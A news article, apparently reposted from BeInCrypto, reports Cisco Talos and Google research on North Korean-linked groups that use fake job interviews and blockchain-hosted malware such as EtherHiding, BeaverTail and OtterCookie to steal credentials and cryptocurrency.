North Korean hackers deploy blockchain-based tools in global cyberattack

North Korean-linked threat actors are using distributed and evasive malware tools to escalate their cyber operations, according to new research from Cisco Talos and Google Threat Intelligence Group.

The campaign aims to steal cryptocurrencies, infiltrate networks, and evade detection through sophisticated recruitment scams.

Evolving malware technology reflects expanded functionality

Cisco Talos researchers have identified an ongoing campaign by the North Korean group Famous Chollima. The group used two complementary malware strains: BeaverTail and OtterCookie. These programs have traditionally been used to steal credentials and leak data, but are now evolving to integrate new capabilities and interoperate more closely.

In a recent incident involving a Sri Lankan organization, attackers lured job candidates into installing disguised malicious code as part of a technical assessment. Although the organization itself was not a direct target, Cisco Talos analysts also observed a keylogging and screenshot module linked to OtterCookie. This highlights the broader risks to individuals involved in fake job offers. This module secretly recorded keystrokes and captured desktop images and automatically sent them to a remote command server.

This observation highlights the continued evolution of North Korean-aligned threat groups and their focus on social engineering techniques to compromise unsuspecting targets.

Blockchain used as command infrastructure

Google’s Threat Intelligence Group (GTIG) has identified an operation by threat actor UNC5342 linked to North Korea. The group used a new malware called “EtherHiding”. This tool hides malicious JavaScript payloads on public blockchains, turning them into decentralized command and control (C2) networks.

Blockchain allows attackers to modify the behavior of malware remotely without using traditional servers. Enforcement by law enforcement will be more difficult. Additionally, GTIG reported that UNC5342 applied EtherHiding in a social engineering campaign called Contagious Interview. This was previously identified by Palo Alto Networks and indicates the persistent presence of threat actors aligned with North Korea.

Targeting job seekers to steal virtual currency and data

According to Google researchers, these cyber operations typically begin with fraudulent job listings targeting professionals in the cryptocurrency and cybersecurity industries. Victims are invited to participate in fake ratings and are instructed to download a file with malicious code embedded in it.

The infection process often involves multiple malware families such as JadeSnow, BeaverTail, and InvisibleFerret. Together, these allow attackers to gain access to systems, steal credentials, and efficiently deploy ransomware. End goals range from espionage and financial theft to long-term network intrusion.

Cisco and Google have published indicators of compromise (IOCs) to help organizations detect and respond to ongoing North Korea-related cyber threats. These resources provide technical details to identify malicious activity and mitigate potential breaches. Researchers warn that the integration of blockchain and modular malware will likely continue to complicate global cybersecurity defense efforts.

The article North Korean hackers deploy blockchain-based tools in global cyber attack was first published on BeInCrypto.